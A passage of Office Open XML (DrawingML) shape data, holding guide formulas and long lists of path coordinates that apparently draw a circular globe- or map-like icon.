              <a:gd name="T106" fmla="*/ 1282 w 1851"/>
              <a:gd name="T107" fmla="*/ 571 h 1718"/>
              <a:gd name="T108" fmla="*/ 1462 w 1851"/>
              <a:gd name="T109" fmla="*/ 1348 h 1718"/>
              <a:gd name="T110" fmla="*/ 1372 w 1851"/>
              <a:gd name="T111" fmla="*/ 1285 h 1718"/>
              <a:gd name="T112" fmla="*/ 1310 w 1851"/>
              <a:gd name="T113" fmla="*/ 1285 h 1718"/>
              <a:gd name="T114" fmla="*/ 1206 w 1851"/>
              <a:gd name="T115" fmla="*/ 1272 h 1718"/>
              <a:gd name="T116" fmla="*/ 1178 w 1851"/>
              <a:gd name="T117" fmla="*/ 1244 h 1718"/>
              <a:gd name="T118" fmla="*/ 1108 w 1851"/>
              <a:gd name="T119" fmla="*/ 1293 h 1718"/>
              <a:gd name="T120" fmla="*/ 1060 w 1851"/>
              <a:gd name="T121" fmla="*/ 1487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851" h="1718">
                <a:moveTo>
                  <a:pt x="464" y="118"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781" y="1188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="1383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="1654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="1689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="1383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="118"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1255" y="584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1255" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290" y="501"/>
                </a:lnTo>
                <a:lnTo>
